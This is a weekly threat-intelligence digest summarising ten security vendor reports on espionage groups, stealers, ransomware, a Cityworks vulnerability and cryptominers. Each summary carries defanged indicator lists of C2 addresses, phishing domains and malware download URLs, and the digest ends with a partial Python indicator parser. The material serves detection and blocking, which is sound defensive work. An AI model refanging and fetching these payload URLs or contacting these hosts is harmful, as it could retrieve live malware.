This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 50 threat intelligence reports and prepared a concise summary of these reports, including pertinent metadata that was extracted. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. All indicators are defanged with [.] and must be refanged before being loaded into a blocklist or detection rule. More granular information, including TTPs, on all reports is available via RST Report Hub.

Title: Stately Taurus Activity in Southeast Asia Links to Bookworm Malware
Link: https://unit42.paloaltonetworks.com/stately-taurus-uses-bookworm-malware/
Summary: Unit 42 ties recent activity by the Stately Taurus group, targeting organizations in Southeast Asia, to a stager malware family known as PubLoad. PubLoad is loaded through DLL sideloading (the sideloaded library observed is BrMod104.dll) and talks to its command and control (C2) server over HTTP requests crafted to look like legitimate Windows Update traffic. The research also links PubLoad to the Bookworm malware framework: both share execution flow and C2 communication patterns, suggesting a refined and adaptive toolset.
Historical analysis ties the group to past, previously unattributed attacks against governmental organizations, showing the persistence and evolution of its tactics and tools. Note that the download[.]microsoft[.]com URL listed below is the legitimate Windows Update path that the C2 traffic imitates: use it as a pattern for spotting update-lookalike requests going to the listed IPs and domains, not as a destination to block.
Threats: red_delta_group bookworm dll_sideloading_technique toneshell proxyshell_vuln proxylogon_exploit pubload lazarus_group
Indicators of compromise:
-------------------------
ip: 123[.]253[.]32[.]15, 103[.]27[.]202[.]80, 103[.]27[.]202[.]68, 103[.]27[.]202[.]87, 123[.]253[.]35[.]231
domain: www[.]fjke5oe[.]com, update[.]fjke5oe[.]com, www[.]uvfr4ep[.]com, www[.]hbsanews[.]com, www[.]i5y3dl[.]com, www[.]b8pjmgd6[.]com, www[.]zimbra[.]page, www[.]ggrdl4[.]com, www[.]gm4rys[.]com
url: http://download[.]microsoft[.]com/v11/2/windowsupdate/redir/v6-win7sp1-wuredir[.]cab
hash:
- sha256=2a00d95b658e11ca71a8de532999dd33ddee7f80432653427eaa885b611ddd87
- sha256=b382cc85eee95a620fc11370309ff76de9a3bcaefb645790434d8251a3b9fce1
- sha256=a08e0d1839b86d0d56a52d07123719211a3c3d43a6aa05aa34531a72ed1207dc
- sha256=ab9d8f1021f2a99c74aa66f8ddb52996ac2337da9de2676d090b87e19ce93033
- sha256=243b92959cd9aa03482f3398fbe81b4874c50a5945fe6b0c0abb432a33db853f
- sha256=a0887fa90f88dd002b025a97b3a57e4fdb7f5fdd725490d96776f8626f528ef2
- sha256=a2452456eb3a1a51116d9c2991aae3b0982acc1a9b30efee92a4f102dc4d2927
- sha256=3e137da41cb509412ee230c6d7aac3d69361358b28c3a09ec851d3c0f3853326
- sha256=fdad627a21a95ea2a6136c264c6a6cc2f0910a24881118b6eabc2d6509dc8dd7
- sha256=ab54af1dbe6a82488db161a7f57cd74f2dd282a9522587f18313b4e9835dc558
- sha256=3cef0b5f069cc1d15d36aa83d54d2a7be79b29b02081b6592dd4714639ad0a66
- sha256=43de1831368e6420b90210e15f72cea9171478391e15efdd608ad22fe916cea8
- sha256=2bae8b07f5098e1ca8fb5a5776eb874072ace4e19734cba4af4450eeccde7f89
- sha256=a229a2943cf8d1b073574f0c050ca06392d0525b2028f4b4b04d1e4b40110c66
- sha256=9192a1c1ab42186a46e08b914d66253440af2d2be6b497c34fe4b1770c3b5e01
- sha256=4a92fa725adc57d7b501f33e87230a8291cf8ad22d4d3a830293abcc0ac10d12
- sha256=da8ef50fe5e571d0143a758c7c66bb55653f1f2d04f16464fc857226441d79b2
- sha256=f0df09513dcf292264b3336269952c7e9ff685df8180a2035bee9f3143b36609
- sha256=167a842b97d0434f20e0cd6cf73d07079255a743d26606b94fc785a0f3c6736e
- sha256=eb176117650d6a2d38ff435238c5e2a6d0f0bb2a9e24efed438a33d8a2e7a1ea
- sha256=cf61b7a9bdde2a39156d88f309f230a7d44e9feaf0359947e1f96e069eca4e86
- sha256=5064b2a8fcfc58c18f53773411f41824b7f6c2675c1d531ffa109dc4f842119b
- sha256=fbc67446daaa0a0264ed7a252ab42413d6a43c2e5ab43437c2b3272daec85e81
- sha256=f7b024196ac50bd0f7ed362a532e83edf154bb60fcf24d0ab5297d0c6beaca0f
- sha256=bbf12ee2cd71dbcf2948adf64f354ad7c69d6b6ff0b78ea76b3df2d02b08ed0f
- sha256=fa739724a4b6f7a766a2d7695d7da7b33a6ac834672c1b544dd555c93600a637
- sha256=d7dbfb2b755418842fea4fca5628f0b36bbd128a71ddcd858b4b3c67ba78f516
- sha256=6804b10aefe8fdb2b33ecf3bc5a93f49413ef66001b561e6fc121990d703d780
- sha256=72aa72a4a4bdb09146c587304c6639eae65900cb2ea26911540a77d1f9b7acf6
- sha256=fb25a69ffc18b79ee664462e0717cf5e70820948d5d2ca4c192fac8b1ede91c2
- sha256=dcc349a1b624f6b949f181a7dd859a82715b4d3b6c37c7e5be1b729cd8e6f01f
- sha256=51bf329ba04a042789bad3b395092488a3d89130dc72818985cde11fb85f8389
- sha256=b7e042d2accdf4a488c3cd46ccd95d6ad5b5a8be71b5d6d76b8046f17debaa18
- sha256=41276827827b95c9b5a9fbd198b7cff2aef6f90f2b2b3ea84fadb69c55efa171
- sha256=4fbfbf1cd2efaef1906f0bd2195281b77619b9948e829b4d53bf1f198ba81dc5
- sha256=4e8717c9812318f8775a94fc2bffcf050eacfbc30ea25d0d3dcfe61b37fe34bb
- sha256=98d6db9b86d713485eb376e156d9da585f7ac369816c4c6adb866d845ac9edc7
- sha256=a02766b3950dbb86a129384cf9060c11be551025a7f469e3811ea257a47907d5
- sha256=4b6f0ae4abc6b73a68d9ee5ad9c0293baa4e7e94539ea43c0973677c0ee7f8cb
email:

Title: Zhong Stealer Analysis: New Malware Targeting Fintech and Cryptocurrency
Link: https://any.run/cybersecurity-blog/zhong-stealer-malware-analysis/
Summary: In December 2024, a phishing campaign targeting the cryptocurrency and fintech sectors was discovered, involving
a new malware called Zhong Stealer. The malware contacts a command-and-control server hosted in Hong Kong and performs host reconnaissance before stealing anything, including reading a component inventory file and checking the system language so that it can avoid running in unwanted regions. Its main goal is to steal credentials saved by commonly used browsers; it exfiltrates the data over the non-standard port 1131 to evade detection, and it persists across reboots by modifying Windows registry keys and creating scheduled tasks. The campaign relies on social engineering aimed at customer support teams. Note that the staging host below is a bucket-specific hostname on Alibaba Cloud OSS: block or hunt for the full hostname and URLs, not the aliyuncs[.]com parent domain.
Threats: zhong_stealer
Indicators of compromise:
-------------------------
ip: 156[.]245[.]23[.]188, 47[.]79[.]64[.]228
domain: kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com
url: https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/TASLogin[.]log, https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/TASLoginBase[.]dll, https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/down[.]exe, https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/uu[.]txt
hash:
- sha256=1abffe97aafe9916b366da57458a78338598cab9742c2d9e03e4ad0ba11f29bf
- sha256=4eaebd93e23be3427d4c1349d64bef4b5fc455c93aebb9b5b752981e9266488e
- sha256=e46779869c6797b294cb097f47027a5c52466fd11112b6ccd52c569578d4b8cd
- sha1=ce120e922ed4156dbd07de8335c5a632974ec527, md5=778b6521dd2b07d7db0eaeaab9a2f86b, sha256=02244934046333f45bc22abe6185e6ddda033342836062afb681a583aa7d827f
email: zhongmaziil992@outlook[.]com

Title: Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger
Link: https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/
Summary: The Google Threat Intelligence Group (GTIG) has identified a rise in Russian state-aligned threat actors targeting Signal Messenger accounts, particularly those associated with military personnel, politicians, journalists, and activists, amid Russia's ongoing war in Ukraine. The core technique abuses Signal's legitimate "linked devices" feature: victims are lured into scanning malicious QR codes that link their account to an adversary-controlled Signal instance, which from then on receives their messages in real time, with no malware on the victim's phone required. Two clusters, UNC5792 and UNC4221, run these operations with phishing pages imitating Signal group invites (the domain list below reflects that lure) and, for UNC4221, phishing kits tailored to military users. Established actors such as APT44 (Sandworm) and Turla have additionally used scripts and malware to pull Signal messages off already compromised devices. Together these show a broader trend of secure messaging platforms being targeted in conflict zones. Because device linking is a feature rather than an exploit, the practical check for at-risk users is to review the Linked Devices list in Signal's settings and remove anything unrecognised.
Threats: sandworm_group unc5792_group uac-0195_group unc4221_group wavesign rclone_tool chisel_tool turla_group ghostwriter_group robocopy_tool seaborgium_group
Indicators of compromise:
-------------------------
ip: 150[.]107[.]31[.]194:18000
domain: signal-groups[.]tech, signal-confirm[.]site, teneta[.]add-group[.]site, signal-protect[.]host, add-signal-group[.]com, add-signal-groups[.]com, group-signal[.]com, groups-signal[.]site, signal-device-off[.]online, signal-group-add[.]com, signal-group[.]com, signal-group[.]site, signal-group[.]tech, signal-groups-add[.]com, signal-groups[.]site, signal-security[.]online, signal-security[.]site, signalgroup[.]site, signals-group[.]com, confirm-signal[.]site, teneta[.]join-group[.]online, group-teneta[.]online, helperanalytics[.]ru, teneta[.]group, group[.]kropyva[.]site
url:
hash:
- md5=e078778b62796bab2d7ab2b04d6b01bf
- md5=a97a28276e4f88134561d938f60db495
- md5=b379d8f583112cad3cf60f95ab3a67fd
- md5=b27ff24870d93d651ee1d8e06276fa98
email:

Title: Trimble Cityworks: CVE-2025-0994
Link: https://www.recordedfuture.com/blog/trimble-cityworks-cve-2025-0994-vulnerability-analysis
Summary: CVE-2025-0994 is a deserialization vulnerability in Trimble Cityworks, which can
be exploited by an authenticated attacker to achieve remote code execution on the Microsoft IIS web server hosting the application. Because Cityworks is used to run critical infrastructure services such as water management and energy distribution, exploitation puts those services at risk. Observed post-exploitation activity includes custom Rust-based loaders that deploy VShell and Cobalt Strike, obfuscated JavaScript, and executables with randomized names. The IoCs published by Trimble are mostly IP addresses tied to Cobalt Strike command-and-control servers. Since exploitation requires valid credentials, patching should be paired with a review of Cityworks accounts and of unusual child processes of the IIS worker process on the application server.
Threats: cobalt_strike vshell putty_tool
Indicators of compromise:
-------------------------
ip: 192[.]210[.]239[.]172:3219, 192[.]210[.]239[.]172:4219, 23[.]247[.]136[.]238, 31[.]59[.]70[.]13, 31[.]59[.]70[.]11, 149[.]112[.]117[.]49, 192[.]210[.]137[.]81, 192[.]210[.]183[.]118
domain: cdn[.]phototagx[.]com, ifode[.]xyz
url: https://cdn[.]lgaircon[.]xyz:443/jquery-3[.]3[.]1[.]min[.]js, https://192[.]210[.]239[.]172/messages/73KWf-o0-s0hxVCDJp1sfAHRcgdm7
hash:
- sha256=4b7561e27c87a1895446d7f2b83e2d9fcf71e6d6e8bc99d44818dc39a6ff99d5
- sha256=4ffc33bdc8527a2e8cb87e49cdc16c3b1480dfc135e507d552f581a67d1850a9
- sha256=8a6c735f3608719ec9f46d9c6c5fc196db8c97065957c218b98733a491edd899
- sha256=883d849b94238c26c57c0595ccb95b8c356628887b9a3628bf56e726332af925
- sha256=151a71c43e63db802d41d5d715aa98eb1b236e0a6441076a8d30fd93990416b4
- sha256=1de72c03927bcd2810ce98205ff871ef1ebf4344fba187e126e50caa1e43250b
- sha256=14a072113baa0a1e1e2b6044068c7bc972ae5e541a0aec06577b0d6663140079
- sha256=04dc3a16e1e2b4924943805a1cea5e402c4f2304c717ea21fdf43274b8c34a84
- sha256=f09b51b759dfe7de06fa724bd89592f5b8eae57053d5fb4891e40f24055103fb
email:

Title: LightSpy Expands Command List to Include Social Media Platforms
Link: https://hunt.io/blog/lightspy-malware-targets-facebook-instagram
Summary: LightSpy is a sophisticated malware framework first identified in 2020 that targets multiple platforms, including mobile devices, Windows, macOS, Linux, and routers. It is delivered through watering-hole sites and exploits, and its operators rotate infrastructure frequently to stay ahead of detection. Recent findings show that its command set has grown to more than 100 commands and that its focus has shifted from messaging apps to social media platforms such as Facebook and Instagram, from which it collects private messages, contact lists, and account metadata. Investigation of the associated servers found live infrastructure serving Windows and iOS components, evidence of continued development of the malware's data-collection and surveillance capabilities. The IoC list below pairs several IPs with non-standard ports and includes panel-style URLs (front_api/cmd_list, version[.]json); those IP:port pairs and paths are more specific hunting material than the bare addresses.
Threats: lightspy watering_hole_technique deepdata
Indicators of compromise:
-------------------------
ip: 43[.]248[.]8[.]76, 149[.]104[.]18[.]80, 45[.]125[.]34[.]126:49000, 149[.]104[.]18[.]80:10000, 45[.]125[.]34[.]126, 103[.]238[.]227[.]138, 43[.]248[.]8[.]108, 149[.]104[.]18[.]251, 43[.]248[.]136[.]104:50000, 149[.]104[.]18[.]80:30000, 149[.]104[.]18[.]80:40002, 45[.]248[.]8[.]108:10002, 43[.]248[.]8[.]108:20002, 45[.]155[.]220[.]79:51200, 45[.]155[.]220[.]79:55501, 149[.]104[.]18[.]251:10000, 149[.]104[.]18[.]251:20000, 45[.]125[.]34[.]126:51200, 45[.]125[.]34[.]126:53501, 45[.]155[.]220[.]194:51200, 45[.]155[.]220[.]194:53501, 43[.]248[.]8[.]76:10002, 43[.]248[.]8[.]76:20002
domain: hk[.]cdn[.]cat
url: http://149[.]104[.]18[.]80:30000/963852741/ios/version[.]json, https://45[.]125[.]34[.]126:49000/ujmfanncy76211/front_api/cmd_list, https://149[.]104[.]18[.]80:10000/ujmfanncy76211/front_api/cmd_list, https://149[.]104[.]18[.]80:40002/963852741/ios/version[.]json, https://149[.]104[.]18[.]80:30000/963852741/ios/plugins/manifest[.]json, https://149[.]104[.]18[.]80:10000/963852741/login
hash:
- md5=81d2bd4781e3753b508ff6d966dbf160
- sha256=890712c46e6629a59d1d82840256530f1cd3f1eda5c1e7f7f459ca786e120ba7
- sha256=9e4e2c92037f43441376685af7f30c6df602ed9706715073e696a6a178a4b5d7
- sha256=bd6ec04d41a5da66d23533e586c939eece483e9b105bd378053e6073df50ba99
- sha256=9da5c381c28e0b2c0c0ff9a6ffcd9208f060537c3b6c1a086abe2903e85f6fdd
- sha256=f05b8387f808a598338ce2258014b2c259a4297a5593779e46029b3c5539ea4e
- sha256=98a5275997acab23c26165980f221eaf2aab90b779af162c06e8823b4d19c7a3
- sha256=72eff7f7f928f54db67d9b3aeee9a6c2b0af89edc0a71ce09715489ac7644a68
- sha256=250e2aefc5a31019da9afeb22b1c704c6fd4db2da1ff6b5a0be4c63d23a32090
- sha256=10c43f9dfaf94777f89248720555d17ac275b21ca726291989672b34f3991bc3
- sha256=2e86456358046e347e05dce6ef6e30af92560901c145b95329fecaf6e64bd898
- sha256=1d9293814fa3ce62fa67c1cbb8661660ffe1caa848142ba7f58dbbb60bc491ba
- sha256=7147672b45832714c8b3d075665345d0860e9ebb672c4b5cbbe17243270ca41d
- sha256=7dbc26526fa32e1c91767d8b18abd3f4367f1b55b0f9ccf338fe5b9f74a36e48
- sha256=e7b9e5e3bd6f72c39ef687ae59b2380815e827ea479ad142f278f295d706c5ec
- sha256=29e090acf7aa1296fa5d22b0df92a830e7a58467f966dd0f78bd1560dc0bad45
- sha256=74ce9f196c930c50811e4640283779ddd971e6a5ad6771c0577a80147c12bd35
- sha256=aee8ca6bcfff02ae0f931b76f48e39576477af289385cbcde27d3ac3e7fae35e
- sha256=0258edc8c3efe8b3d8ccfce790c9192994e54a81dded1c0e116093d638506a01
email:

Title: SecTopRAT bundled in Chrome installer distributed via Google Ads
Link: https://www.malwarebytes.com/blog/cybercrime/2025/02/sectoprat-bundled-in-chrome-installer-distributed-via-google-ads
Summary: Cybercriminals are abusing Google Ads to distribute a counterfeit Google Chrome installer. Users searching for Chrome are sent by a sponsored result to an intermediary page hosted on Google Sites, which leads to a lookalike download domain serving a malicious GoogleChrome[.]exe that contacts a remote server to receive additional instructions.
Once executed, the installer adds antivirus exclusions and masquerades as a legitimate browser while injecting the SecTopRAT payload into a system process, which then connects to the attackers' command and control server. The case shows how trusted platforms (search advertising and Google Sites) can be chained to deliver malware, and why installers should be fetched from the vendor's own domain rather than from sponsored search results.
Threats: sectop_rat
Indicators of compromise:
-------------------------
ip: 45[.]141[.]84[.]208
domain: chrome[.]browser[.]com[.]de, launchapps[.]site
url: https://launchapps[.]site/getCode[.]php, https://launchapps[.]site/3[.]php?uuid=- _uuid, https://sites[.]google[.]com/view/gfbtechd, https://chrome[.]browser[.]com[.]de/GoogleChrome[.]exe
hash:
- sha256=48fdfbe23eef7eddff071d3eda1bc654b94cf86036ca1cca9c73b0175e168a55
- sha256=0f9b2870c4be5ebacb936000ff41f8075ec88d6535161a93df8e6cfea2d8db54
email:

Title: Weak Passwords Led to (SafePay) Ransomware Yet Again
Link: https://www.nccgroup.com/us/research-blog/weak-passwords-led-to-safepay-ransomware-yet-again/
Summary: In a SafePay ransomware incident investigated by NCC Group's Digital Forensics and Incident Response team, the threat actors gained initial access through a misconfigured FortiGate firewall whose settings allowed multi-factor authentication to be bypassed, then authenticated as domain administrators using weak passwords. To keep their access they deployed a UPX-packed backdoor named soc.dll. The ransomware binary (1.exe) encrypts files with ChaCha20, appends the .safepay extension, disables recovery mechanisms such as shadow copies, and refuses to run on systems with Russian language settings.
The attackers also encrypted hypervisors, taking down the virtual machines hosted on them. Code comparison with other ransomware families showed low similarity, so it remains unclear whether SafePay is a new family or a rewrite of an existing one intended to evade detection. The root causes were mundane: weak domain administrator passwords and a firewall configuration that let MFA be bypassed.
Threats: safepay screenconnect_tool qdoor upx_tool runpe_tool process_hollowing_technique blacksuit_ransomware credential_dumping_technique shadow_copies_delete_technique
Indicators of compromise:
-------------------------
ip: 88[.]119[.]167[.]239
domain:
url: http://nj5qix45sxnl4h4og6hcgwengg2oqloj3c2rhc6dpwiofx3jbivcs6qd[.]onion
hash:
- sha256=6c1d36df94ebe367823e73ba33cfb4f40756a5e8ee1e30e8f0ae55d47e220a6a
- sha1=07353237350c35d6dc2c8f143b649cd07c71f62b, sha256=e79608cf1d6b51324c14bef8883054c1238ed5f080222cc464810e6e14adc346
- sha256=921df888aaabcd828a3723f4c9f5fe8b8379c6b7067d16b2ea10152300417eae
email: colinsolomon@protonmail[.]com, depaolakristabelle@protonmail[.]com

Title: Demystifying PKT and Monero Cryptocurrency deployed on MSSQL servers
Link: https://www.seqrite.com/blog/pkt-monero-mining-mssql-malware/
Summary: Seqrite Labs has observed a rise in cryptomining attacks against Microsoft SQL Server hosts, mining both PKT Classic and Monero. After compromising exposed SQL Server instances, the attackers use the built-in certutil utility (a living-off-the-land binary) to download the PacketCrypt miner and launch the mining scripts through PowerShell. The resulting pkt.exe process consumed up to 99% of CPU on affected hosts, degrading performance noticeably.
The mining tools themselves are legitimate open-source software written in Rust and published in a GitHub repository associated with the founder of the PKT Cash blockchain, so the attack is multistage and assembled almost entirely from publicly available components. Detection should therefore focus on the delivery chain (SQL Server spawning a shell, certutil or PowerShell) rather than on the miner binaries alone.
Threats: packet_crypt_tool quickheal lolbin_technique xmrig_miner themida_tool ghanarava
Indicators of compromise:
-------------------------
ip: 188[.]81[.]134[.]196
domain:
url: http://188[.]81[.]134[.]196/resources/img/pktw[.]png, http://188[.]81[.]134[.]196/resources/js/info2R[.]txt, http://188[.]81[.]134[.]196/resources/js/infoALT[.]txt
hash:
- sha256=e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562
- sha256=a5ca1e64278543dd9c0423d6e183efaaac1167fc0210da7eea9bf7a1b0246be8
- sha256=9398d7a723e2ba4bb8046c8a6b796d9fc13c530a355d6319a53437e556071f39
- sha256=5369b61daacbb811f1da996b5e61a70719d43175f447ceaa9b9023b875fe70bc
- sha256=250743f1af4b5a9dd18028f792a0432a43d6bf17b50aad75b9d3a0c83786940d
- sha256=b1d169f6904ac5af690243e6d0b042a64089251114a630a740c87208ead52503
email:

Title: Angry Likho: Old beasts in a new forest
Link: https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/
Summary: Angry Likho, also tracked as Sticky Werewolf, is an advanced persistent threat (APT) group active since 2023 with overlaps to the Awaken Likho group. It targets employees of large organizations and government agencies in Russia and Belarus through spear-phishing emails whose attachments are disguised as videoconference invitations; one observed attack used a RAR archive containing malicious LNK files. The key payload is FrameworkSurvivor.exe, which runs a compiled AutoIt (AU3) script for stealthy execution and injects the Lumma stealer, which in turn harvests data from web browsers and cryptocurrency wallets.
As of January 2025 the group has resumed activity with the same techniques, hitting hundreds of victims at Russian firms; the consistency of its tooling and procedures is what allows the new campaign to be attributed to it. The .shop domains below follow the random-word naming pattern typical of Lumma command-and-control infrastructure.
Threats: sticky_werewolf_group core_werewolf_group spear-phishing_technique Trojan.Win32.Generic lumma_stealer anydesk_tool
Indicators of compromise:
-------------------------
ip:
domain: averageorganicfallfaw[.]shop, distincttangyflippan[.]shop, macabrecondfucews[.]shop, greentastellesqwm[.]shop, stickyyummyskiwffe[.]shop, sturdyregularrmsnhw[.]shop, lamentablegapingkwaq[.]shop, innerverdanytiresw[.]shop, standingcomperewhitwo[.]shop, uniedpureevenywjk[.]shop, spotlessimminentys[.]shop, specialadventurousw[.]shop, stronggemateraislw[.]shop, willingyhollowsk[.]shop, handsomelydicrwop[.]shop, softcallousdmykw[.]shop, testdomain123123[.]shop
url: https://testdomain123123[.]shop/FrameworkSurvivor[.]exe
hash:
- md5=f8df6cf748cc3cf7c05ab18e798b3e91
- md5=ef8c77dc451f6c783d2c4ddb726de111
- md5=de26f488328ea0436199c5f728ecd82a
- md5=d4b75a8318befdb1474328a92f0fc79d
- md5=ba40c097e9d06130f366b86deb4a8124
- md5=b0844bb9a6b026569f9baf26a40c36f3
- md5=89052678dc147a01f3db76febf8441e4
- md5=842f8064a81eb5fc8828580a08d9b044
- md5=7c527c6607cc1bfa55ac0203bf395939
- md5=75fd9018433f5cbd2a4422d1f09b224e
- md5=729c24cc6a49fb635601eb88824aa276
- md5=69f6dcdb3d87392f300e9052de99d7ce
- md5=5e17d1a077f86f7ae4895a312176eba6
- md5=373ebf513d0838e1b8c3ce2028c3e673
- md5=351260c2873645e314a889170c7a7750
- md5=23ce22596f1c7d6db171753c1d2612fe
- md5=0c03efd969f6d9e6517c300f8fd92921
- md5=277acb857f1587221fc752f19be27187
- md5=faa47ecbcc846bf182e4ecf3f190a9f4
- md5=d8c6199b414bdf298b6a774e60515ba5
- md5=9d3337f0e95ece531909e4c8d9f1cc55
- md5=6bd84dfb987f9c40098d12e3959994bc
- md5=6396908315d9147de3dff98ab1ee4cbe
- md5=1e210fcc47eda459998c9a74c30f394e
- md5=fe0438938eef75e090a38d8b17687357
- md5=e0f8d7ec2be638fbf3ddf8077e775b2d
- md5=cdd4cfac3ffe891eac5fb913076c4c40
- md5=b57b13e9883bbee7712e52616883d437
- md5=a3f4e422aecd0547692d172000e4b9b9
- md5=9871272af8b06b484f0529c10350a910
- md5=97b19d9709ed3b849d7628e2c31cdfc4
- md5=8e960334c786280e962db6475e0473ab
- md5=76e7cbab1955faa81ba0dda824ebb31d
- md5=7140dbd0ca6ef09c74188a41389b0799
- md5=5c3394e37c3d1208e499abe56e4ec7eb
- md5=47765d12f259325af8acda48b1cbad48
- md5=32da6c4a44973a5847c4a969950fa4c4
email:

Title: Updated Shadowpad Malware Leads to Ransomware Deployment
Link: https://www.trendmicro.com/en_us/research/25/b/updated-shadowpad-malware-leads-to-ransomware-deployment.html
Summary: Shadowpad, a modular backdoor associated with the Chinese threat actor APT41 since it was identified in 2017, has recently been observed deploying a previously undetected ransomware family. The attackers obtained remote network access to 21 companies across several regions by abusing administrative accounts with weak passwords and bypassing multi-factor authentication, then installed Shadowpad inside the victims' networks. A toolset historically used for espionage is thus now being used for ransomware deployment; the ransomware uses AES and RSA encryption. The updated Shadowpad adds keylogging and file retrieval, carries encrypted payloads, and resolves its C2 over DNS over HTTPS to evade network monitoring.
The operational pattern still suggests intelligence-gathering objectives, particularly intellectual property in the manufacturing sector, and a tenuous link to the Teleboyi threat actor was identified through similar decryption techniques. The Threats field below lists the tooling observed alongside Shadowpad (credential dumping with cqhashdump, ntdsutil, Impacket/wmiexec); hunting for those on hosts resolving the listed domains is a reasonable first triage step.
Threats: shadowpad winnti_group supply_chain_technique axiom_group earth_lusca_group dll_sideloading_technique antidebugging_technique evilextractor kodex cqhashdump_tool impacket_tool wmiexec_tool ntdsutil_tool teleboyi_group plugx_rat
Indicators of compromise:
-------------------------
ip: 108[.]61[.]163[.]91
domain: updata[.]dsqurey[.]com, bcs[.]dsqurey[.]com, dsqurey[.]com, dscriy[.]chtq[.]net, sery[.]brushupdata[.]com, time[.]dsqurey[.]com, system[.]chtq[.]net, updata[.]chtq[.]net, network[.]oossafe[.]com, notes[.]oossafe[.]com, caba[.]superdasqe[.]me, ccs[.]superdasqe[.]me, czs[.]superdasqe[.]me, kzb[.]superdasqe[.]me
url:
hash:
- sha256=f50de0fae860a5fd780d953a8af07450661458646293bfd0fed81a1ff9eb4498
- sha256=8d44f2f442ca8f2fbbf75086a6f8d518c300ca93fe9957a9716076919b475865
- sha256=83c1a668ab06f55e6879593ca24eed9f78832be97ac90bb74ef5828067f2d900
- sha256=c19be7a006bd2ba8deb56dcc6127a76f9624c6f1392a1794870dbed6f1a81bd5
- sha256=c4db25ab55af2e943a297a5ecf7a62acc3ad8897ec8ba4ab3226a138da237b82
- sha256=28e6362ecf033b2a26c7457dcbd7ad2ab34e253fb08666d39073391a1254ea41
- sha256=7416f6b69b34b3a36a86e50808e1dc47f4dc665bfd6f394cef65e0ba5eaf961b
- sha256=bc490047fe6e0b0000c6cd147d3cf483105c92cf00450bfe35ac70f276a9e5c8
- sha256=c5f8a256d0969e253633160b9728b6c2bc044f536e92af178a05a598aaa09c1f
- sha256=a2bb321d41b2300e80f9400950fa2125470d5b3927933ab4d6397f0cbf81532a
- sha256=d74b6b2129936377aaccc619bcfd4df4ffbe2f35f960a4b043b23ae78a31ec35
- sha256=366ea3377eaefa28b655b530710c03fb2ace67bb531b1820e916cb02023892ba
- sha256=f8915c5be0649642dac22572355f1462972f5087471f66f6a243f2374b208eb8
- sha256=b38dab1ee402f731313d697d5d79372ae97fcab5704077771b5b82e705e0cd6d
- sha256=625ed0e0ad7d3fbf2738349c767a7990c9f0d388de66104e11df3e0c4632033c
- sha256=431a630983cd327fc70ea49b3a5497a179dbde19d8f13d2cfceef4e47613024b
- sha256=e1d72b0cfc3342b8a6436e3047c3cc54246c346ac179e459d07620d192ba6e01
- sha256=fa7f2ddf91980d639a87465bd2a38eaa44d6079b11ace3b2b3dff03caed66de5
- sha256=b28bc39e569aa0cfe984c341830cb037c5305877ba22a940c3bdaeb43ca87878
- sha256=571607c7f55c3616e4c58db15e3d55317da10294dbc10e0cd1ed24879b8fc051
- sha256=bc5b2ef81593095696433877cccb0ab75ef942258ef4795de5538df842d952f4
- sha256=fa3a3351cd55089d40a7311e4bfaf15e4247416f78383d94ad58809467429b3e
- sha256=2df4c7bfa608ca88d9d659358894226910850ac0d7e566c6c10ec2727361d47b
- sha256=b66660dfe1ce69f706aaa412fcd3ff18554d604df59c09adc2a8117417967ce9
- sha256=7b8ea6b1e2a29190cb28fc98ef837bf4a7a0b71b84177ce9395a5113a843c4d3
- sha256=de4bb30e400f081601d4091206ba6c04ac502f50e0dbac879db8c0202bff8108
- sha256=5dc36e687a7fa3cfbf845e8a53173f37ac38559b6b87f9dcf609a72b3f284035
- sha256=37039a761114251f4556e4fe41c3ec01b7206a483c4698ffe5a0f1617a8bc26b
- sha256=fcb8bf42d852526214578ab4b477b29f2412a7a931c6353db4fa6c221661edf4
- sha256=ceac8b67f19d596b2c2f34d682f88c717d11dd4c1144e2e7439b6bb78adb1736
- sha256=9df4624f815d9b04d31d9b156f7debfd450718336eb0b75100d02cb45d47bd9a
- sha256=28d78e52420906794e4059a603fa9f22d5d6e4479d91e9046a97318c83998679
- sha256=41128b82fa12379034b3c42bdecf8e3b435089f19a5d57726a2a784c25e9d91f
- sha256=c8268641aecad7bd32d20432da49bb8bfc9fe7391b92b5b06352e7f4c93bc19e
- sha256=e06710652fa3c8b45fd0fece3b59e7614ad59a9bc0c570f4721aee3293ecd2d1
- sha256=f4e8841a14aa38352692340729c3ed6909d7521dd777518f12b8bd2d15ea00c5
- sha256=aa1233393dded792b74e334c50849c477c4b86838b32ef45d6ab0dc36b4511e3
email:

This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
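Every report in this digest publishes its indicators in the same defanged, labelled form (ip:, domain:, url:, hash:, email:, with [.] in place of dots and a "- algo=hex" entry per hash). The parser below is an added example written for this page, not code from RST Cloud's tooling: it refangs the values, validates each one (octet ranges, ip:port splitting, hash label versus hex length) and keeps anything it rejects in an errors list so that a malformed indicator is never silently shipped to a blocklist. It assumes one label per line, as in the entries above, and also tolerates the flattened one-line hash form. The first sample block is copied verbatim from the Zhong Stealer entry; the second is constructed to exercise the edge cases and is not from any report.

```python
import re
from dataclasses import dataclass, field

HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}   # expected hex length per algorithm
LABEL = re.compile(r"^(ip|domain|url|hash|email):\s*(.*)$")
IPV4 = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})(?::(\d{1,5}))?$")

@dataclass
class IocSet:
    ips: list = field(default_factory=list)       # (address, port or None)
    domains: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    hashes: list = field(default_factory=list)    # (algorithm, lowercase hex)
    emails: list = field(default_factory=list)
    errors: list = field(default_factory=list)    # entries rejected by validation

def refang(value: str) -> str:
    """Undo defanging: [.] [:] [@] back to . : @, and the common hxxp:// variant back to http://."""
    value = value.strip().replace("[.]", ".").replace("[:]", ":").replace("[@]", "@")
    return re.sub(r"^hxxp", "http", value, flags=re.I)

def _add_value(out: IocSet, section: str, value: str) -> None:
    if section == "ip":
        m = IPV4.match(value)
        if not m or any(int(o) > 255 for o in m.groups()[:4]):
            out.errors.append(value)
            return
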